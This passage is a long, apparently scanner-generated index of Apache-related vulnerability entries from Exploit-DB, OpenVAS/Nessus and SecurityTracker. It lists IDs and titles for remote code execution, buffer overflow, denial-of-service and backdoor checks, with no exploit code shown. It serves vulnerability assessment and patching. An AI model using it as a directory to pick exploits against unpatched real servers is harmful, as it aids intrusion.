17075| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
17076| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
17077| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
17078| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
17079| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
17080| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
17081| [19231] PHP apache_request_headers Function Buffer Overflow
17082| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
17083| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
17084| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
17085| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
17086| [18442] Apache httpOnly Cookie Disclosure
17087| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
17088| [18221] Apache HTTP Server Denial of Service
17089| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
17090| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
17091| [17691] Apache Struts < 2.2.0 - Remote Command Execution
17092| [16798] Apache mod_jk 1.2.20 Buffer Overflow
17093| [16782] Apache Win32 Chunked Encoding
17094| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
17095| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
17096| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
17097| [15319] Apache 2.2 (Windows) Local Denial of Service
17098| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
17099| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
17100| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
17101| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
17102| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
17103| [12330] Apache OFBiz - Multiple XSS
17104| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
17105| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
17106| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
17107| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
17108| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
17109| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
17110| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
17111| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
17112| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
17113| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
17114| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
17115| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
17116| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
17117| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
17118| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
17119| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
17120| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
17121| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
17122| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
17123| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
17124| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
17125| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
17126| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
17127| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
17128| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
17129| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
17130| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
17131| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
17132| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
17133| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
17134| [466] htpasswd Apache 1.3.31 - Local Exploit
17135| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
17136| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
17137| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
17138| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
17139| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
17140| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
17141| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
17142| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
17143| [9] Apache HTTP Server 2.x Memory Leak Exploit
17144|
17145| OpenVAS (Nessus) - http://www.openvas.org:
17146| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
17147| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
17148| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
17149| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
17150| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
17151| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
17152| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
17153| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
17154| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
17155| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
17156| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
17157| [900571] Apache APR-Utils Version Detection
17158| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
17159| [900496] Apache Tiles Multiple XSS Vulnerability
17160| [900493] Apache Tiles Version Detection
17161| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
17162| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
17163| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
17164| [870175] RedHat Update for apache RHSA-2008:0004-01
17165| [864591] Fedora Update for apache-poi FEDORA-2012-10835
17166| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
17167| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
17168| [864250] Fedora Update for apache-poi FEDORA-2012-7683
17169| [864249] Fedora Update for apache-poi FEDORA-2012-7686
17170| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
17171| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
17172| [855821] Solaris Update for Apache 1.3 122912-19
17173| [855812] Solaris Update for Apache 1.3 122911-19
17174| [855737] Solaris Update for Apache 1.3 122911-17
17175| [855731] Solaris Update for Apache 1.3 122912-17
17176| [855695] Solaris Update for Apache 1.3 122911-16
17177| [855645] Solaris Update for Apache 1.3 122912-16
17178| [855587] Solaris Update for kernel update and Apache 108529-29
17179| [855566] Solaris Update for Apache 116973-07
17180| [855531] Solaris Update for Apache 116974-07
17181| [855524] Solaris Update for Apache 2 120544-14
17182| [855494] Solaris Update for Apache 1.3 122911-15
17183| [855478] Solaris Update for Apache Security 114145-11
17184| [855472] Solaris Update for Apache Security 113146-12
17185| [855179] Solaris Update for Apache 1.3 122912-15
17186| [855147] Solaris Update for kernel update and Apache 108528-29
17187| [855077] Solaris Update for Apache 2 120543-14
17188| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
17189| [850088] SuSE Update for apache2 SUSE-SA:2007:061
17190| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
17191| [841209] Ubuntu Update for apache2 USN-1627-1
17192| [840900] Ubuntu Update for apache2 USN-1368-1
17193| [840798] Ubuntu Update for apache2 USN-1259-1
17194| [840734] Ubuntu Update for apache2 USN-1199-1
17195| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
17196| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
17197| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
17198| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
17199| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
17200| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
17201| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
17202| [835253] HP-UX Update for Apache Web Server HPSBUX02645
17203| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
17204| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
17205| [835236] HP-UX Update for Apache with PHP HPSBUX02543
17206| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
17207| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
17208| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
17209| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
17210| [835188] HP-UX Update for Apache HPSBUX02308
17211| [835181] HP-UX Update for Apache With PHP HPSBUX02332
17212| [835180] HP-UX Update for Apache with PHP HPSBUX02342
17213| [835172] HP-UX Update for Apache HPSBUX02365
17214| [835168] HP-UX Update for Apache HPSBUX02313
17215| [835148] HP-UX Update for Apache HPSBUX01064
17216| [835139] HP-UX Update for Apache with PHP HPSBUX01090
17217| [835131] HP-UX Update for Apache HPSBUX00256
17218| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
17219| [835104] HP-UX Update for Apache HPSBUX00224
17220| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
17221| [835101] HP-UX Update for Apache HPSBUX01232
17222| [835080] HP-UX Update for Apache HPSBUX02273
17223| [835078] HP-UX Update for ApacheStrong HPSBUX00255
17224| [835044] HP-UX Update for Apache HPSBUX01019
17225| [835040] HP-UX Update for Apache PHP HPSBUX00207
17226| [835025] HP-UX Update for Apache HPSBUX00197
17227| [835023] HP-UX Update for Apache HPSBUX01022
17228| [835022] HP-UX Update for Apache HPSBUX02292
17229| [835005] HP-UX Update for Apache HPSBUX02262
17230| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
17231| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
17232| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
17233| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
17234| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
17235| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
17236| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
17237| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
17238| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
17239| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
17240| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
17241| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
17242| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
17243| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
17244| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
17245| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
17246| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
17247| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
17248| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
17249| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
17250| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
17251| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
17252| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
17253| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
17254| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
17255| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
17256| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
17257| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
17258| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
17259| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
17260| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
17261| [801942] Apache Archiva Multiple Vulnerabilities
17262| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
17263| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
17264| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
17265| [801284] Apache Derby Information Disclosure Vulnerability
17266| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
17267| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
17268| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
17269| [800680] Apache APR Version Detection
17270| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
17271| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
17272| [800677] Apache Roller Version Detection
17273| [800279] Apache mod_jk Module Version Detection
17274| [800278] Apache Struts Cross Site Scripting Vulnerability
17275| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
17276| [800276] Apache Struts Version Detection
17277| [800271] Apache Struts Directory Traversal Vulnerability
17278| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
17279| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
17280| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
17281| [103122] Apache Web Server ETag Header Information Disclosure Weakness
17282| [103074] Apache Continuum Cross Site Scripting Vulnerability
17283| [103073] Apache Continuum Detection
17284| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
17285| [101023] Apache Open For Business Weak Password security check
17286| [101020] Apache Open For Business HTML injection vulnerability
17287| [101019] Apache Open For Business service detection
17288| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
17289| [100923] Apache Archiva Detection
17290| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
17291| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
17292| [100813] Apache Axis2 Detection
17293| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
17294| [100795] Apache Derby Detection
17295| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
17296| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
17297| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
17298| [100514] Apache Multiple Security Vulnerabilities
17299| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
17300| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
17301| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
17302| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
17303| [72626] Debian Security Advisory DSA 2579-1 (apache2)
17304| [72612] FreeBSD Ports: apache22
17305| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
17306| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
17307| [71512] FreeBSD Ports: apache
17308| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
17309| [71256] Debian Security Advisory DSA 2452-1 (apache2)
17310| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
17311| [70737] FreeBSD Ports: apache
17312| [70724] Debian Security Advisory DSA 2405-1 (apache2)
17313| [70600] FreeBSD Ports: apache
17314| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
17315| [70235] Debian Security Advisory DSA 2298-2 (apache2)
17316| [70233] Debian Security Advisory DSA 2298-1 (apache2)
17317| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
17318| [69338] Debian Security Advisory DSA 2202-1 (apache2)
17319| [67868] FreeBSD Ports: apache
17320| [66816] FreeBSD Ports: apache
17321| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
17322| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
17323| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
17324| [66081] SLES11: Security update for Apache 2
17325| [66074] SLES10: Security update for Apache 2
17326| [66070] SLES9: Security update for Apache 2
17327| [65998] SLES10: Security update for apache2-mod_python
17328| [65893] SLES10: Security update for Apache 2
17329| [65888] SLES10: Security update for Apache 2
17330| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
17331| [65510] SLES9: Security update for Apache 2
17332| [65472] SLES9: Security update for Apache
17333| [65467] SLES9: Security update for Apache
17334| [65450] SLES9: Security update for apache2
17335| [65390] SLES9: Security update for Apache2
17336| [65363] SLES9: Security update for Apache2
17337| [65309] SLES9: Security update for Apache and mod_ssl
17338| [65296] SLES9: Security update for webdav apache module
17339| [65283] SLES9: Security update for Apache2
17340| [65249] SLES9: Security update for Apache 2
17341| [65230] SLES9: Security update for Apache 2
17342| [65228] SLES9: Security update for Apache 2
17343| [65212] SLES9: Security update for apache2-mod_python
17344| [65209] SLES9: Security update for apache2-worker
17345| [65207] SLES9: Security update for Apache 2
17346| [65168] SLES9: Security update for apache2-mod_python
17347| [65142] SLES9: Security update for Apache2
17348| [65136] SLES9: Security update for Apache 2
17349| [65132] SLES9: Security update for apache
17350| [65131] SLES9: Security update for Apache 2 oes/CORE
17351| [65113] SLES9: Security update for apache2
17352| [65072] SLES9: Security update for apache and mod_ssl
17353| [65017] SLES9: Security update for Apache 2
17354| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
17355| [64783] FreeBSD Ports: apache
17356| [64774] Ubuntu USN-802-2 (apache2)
17357| [64653] Ubuntu USN-813-2 (apache2)
17358| [64559] Debian Security Advisory DSA 1834-2 (apache2)
17359| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
17360| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
17361| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
17362| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
17363| [64443] Ubuntu USN-802-1 (apache2)
17364| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
17365| [64423] Debian Security Advisory DSA 1834-1 (apache2)
17366| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
17367| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
17368| [64251] Debian Security Advisory DSA 1816-1 (apache2)
17369| [64201] Ubuntu USN-787-1 (apache2)
17370| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
17371| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
17372| [63565] FreeBSD Ports: apache
17373| [63562] Ubuntu USN-731-1 (apache2)
17374| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
17375| [61185] FreeBSD Ports: apache
17376| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
17377| [60387] Slackware Advisory SSA:2008-045-02 apache
17378| [58826] FreeBSD Ports: apache-tomcat
17379| [58825] FreeBSD Ports: apache-tomcat
17380| [58804] FreeBSD Ports: apache
17381| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
17382| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
17383| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
17384| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
17385| [57335] Debian Security Advisory DSA 1167-1 (apache)
17386| [57201] Debian Security Advisory DSA 1131-1 (apache)
17387| [57200] Debian Security Advisory DSA 1132-1 (apache2)
17388| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
17389| [57145] FreeBSD Ports: apache
17390| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
17391| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
17392| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
17393| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
17394| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
17395| [56067] FreeBSD Ports: apache
17396| [55803] Slackware Advisory SSA:2005-310-04 apache
17397| [55519] Debian Security Advisory DSA 839-1 (apachetop)
17398| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
17399| [55355] FreeBSD Ports: apache
17400| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
17401| [55261] Debian Security Advisory DSA 805-1 (apache2)
17402| [55259] Debian Security Advisory DSA 803-1 (apache)
17403| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
17404| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
17405| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
17406| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
17407| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
17408| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
17409| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
17410| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
17411| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
17412| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
17413| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
17414| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
17415| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
17416| [54439] FreeBSD Ports: apache
17417| [53931] Slackware Advisory SSA:2004-133-01 apache
17418| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
17419| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
17420| [53878] Slackware Advisory SSA:2003-308-01 apache security update
17421| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
17422| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
17423| [53848] Debian Security Advisory DSA 131-1 (apache)
17424| [53784] Debian Security Advisory DSA 021-1 (apache)
17425| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
17426| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
17427| [53735] Debian Security Advisory DSA 187-1 (apache)
17428| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
17429| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
17430| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
17431| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
17432| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
17433| [53282] Debian Security Advisory DSA 594-1 (apache)
17434| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
17435| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
17436| [53215] Debian Security Advisory DSA 525-1 (apache)
17437| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
17438| [52529] FreeBSD Ports: apache+ssl
17439| [52501] FreeBSD Ports: apache
17440| [52461] FreeBSD Ports: apache
17441| [52390] FreeBSD Ports: apache
17442| [52389] FreeBSD Ports: apache
17443| [52388] FreeBSD Ports: apache
17444| [52383] FreeBSD Ports: apache
17445| [52339] FreeBSD Ports: apache+mod_ssl
17446| [52331] FreeBSD Ports: apache
17447| [52329] FreeBSD Ports: ru-apache+mod_ssl
17448| [52314] FreeBSD Ports: apache
17449| [52310] FreeBSD Ports: apache
17450| [15588] Detect Apache HTTPS
17451| [15555] Apache mod_proxy content-length buffer overflow
17452| [15554] Apache mod_include priviledge escalation
17453| [14771] Apache <= 1.3.33 htpasswd local overflow
17454| [14177] Apache mod_access rule bypass
17455| [13644] Apache mod_rootme Backdoor
17456| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
17457| [12280] Apache Connection Blocking Denial of Service
17458| [12239] Apache Error Log Escape Sequence Injection
17459| [12123] Apache Tomcat source.jsp malformed request information disclosure
17460| [12085] Apache Tomcat servlet/JSP container default files
17461| [11438] Apache Tomcat Directory Listing and File disclosure
17462| [11204] Apache Tomcat Default Accounts
17463| [11092] Apache 2.0.39 Win32 directory traversal
17464| [11046] Apache Tomcat TroubleShooter Servlet Installed
17465| [11042] Apache Tomcat DOS Device Name XSS
17466| [11041] Apache Tomcat /servlet Cross Site Scripting
17467| [10938] Apache Remote Command Execution via .bat files
17468| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
17469| [10773] MacOS X Finder reveals contents of Apache Web files
17470| [10766] Apache UserDir Sensitive Information Disclosure
17471| [10756] MacOS X Finder reveals contents of Apache Web directories
17472| [10752] Apache Auth Module SQL Insertion Attack
17473| [10704] Apache Directory Listing
17474| [10678] Apache /server-info accessible
17475| [10677] Apache /server-status accessible
17476| [10440] Check for Apache Multiple / vulnerability
17477|
17478| SecurityTracker - https://www.securitytracker.com:
17479| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
17480| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
17481| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
17482| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
17483| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
17484| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
17485| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
17486| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
17487| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
17488| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
17489| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
17490| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
17491| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
17492| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
17493| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
17494| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
17495| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
17496| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
17497| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
17498| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
17499| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
17500| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
17501| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
17502| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
17503| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
17504| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
17505| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
17506| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
17507| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
17508| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
17509| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
17510| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
17511| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
17512| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
17513| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
17514| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
17515| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
17516| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
17517| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
17518| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
17519| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
17520| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
17521| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
17522| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
17523| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
